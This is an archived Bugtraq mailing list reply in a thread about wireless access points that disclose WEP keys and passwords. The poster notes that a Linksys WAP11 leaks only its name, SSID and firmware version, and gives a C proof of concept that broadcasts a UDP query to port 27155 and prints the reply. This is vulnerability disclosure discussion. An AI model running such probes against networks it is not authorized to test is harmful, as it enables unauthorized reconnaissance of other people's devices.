Bugtraq mailing list archives

Re: Accesspoints disclose wep keys, password and mac filter (fwd)

From: Thomas Sarlandie <sarfata () altern org>
Date: Tue, 05 Nov 2002 15:24:07 +0100

Hi,

Linksys WAP11-V2.2 seems to be vulnerable in a different way. It onlyreturns AP's name,SSID and firmware version. Except for firmware version, those are notprivate informations.


Quickly patched proof of concept :

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <sys/socket.h>

typedef struct {
 char type[28];
 char blank1[8];
 char apname[32];
 char firmware[6];
 char blank2[11];
 char ssid[32];
}
__attribute__ ((packed)) answer;

int main()
{
       char rcvbuffer[1024];
       struct sockaddr_in sin;
       answer* ans = (answer *)rcvbuffer;
       int sd, ret, val;

       sin.sin_family          = AF_INET;
       sin.sin_addr.s_addr     = inet_addr("255.255.255.255");
       sin.sin_port            = htons(27155);

       sd = socket(AF_INET, SOCK_DGRAM, 0);
       if (sd < 0)
               perror("socket");

       val = 1;
       ret = setsockopt(sd, SOL_SOCKET, SO_BROADCAST, &val, sizeof(val));
       if (ret < 0)
       {
               perror("setsockopt");
               exit(1);
       }

       ret = sendto(sd, "gstsearch", 9, 0, &sin, sizeof(struct sockaddr));
       if (ret < 0)
       {
               perror("sendto");
               exit(1);
       }

       ret = read(sd,&rcvbuffer,sizeof(rcvbuffer));
   if (ret > 0)
   {
     printf("Type             : %s\n", ans->type);
     printf("Announced Name   : %s\n", ans->apname);
     printf("Firmware version : %s\n", ans->firmware);
     printf("SSID             : %s\n", ans->ssid);
   }
   else
     perror("read");
       return 0;
}

thomas

KHAMSIN Security News
KSN Reference: 2002-11-01 0001 ULO
---------------------------------------------------------------------------

Title
-----
       Accesspoints disclose wep keys, password and mac filter

Date
----
       2002-11-01

Current thread:

Accesspoints disclose wep keys, password and mac filter (fwd) Tom Knienieder (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Frank Louwers (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Cliff Albert (Nov 04)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Hakan Carlsson (Nov 07)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Thomas Sarlandie (Nov 08)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Tollef Fog Heen (Nov 09)
- <Possible follow-ups>
- RE: Accesspoints disclose wep keys, password and mac filter (fwd) Melson, Paul (Nov 04)
  - Re: Accesspoints disclose wep keys, password and mac filter (fwd) Casper Dik (Nov 08)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) d k (Nov 05)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) informatik.koerfer (Nov 07)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) informatik.koerfer (Nov 07)
  - Re: Accesspoints disclose wep keys, password and mac filter (fwd) tenty (Nov 09)
- Re: Accesspoints disclose wep keys, password and mac filter (fwd) Alex Harasic (Nov 08)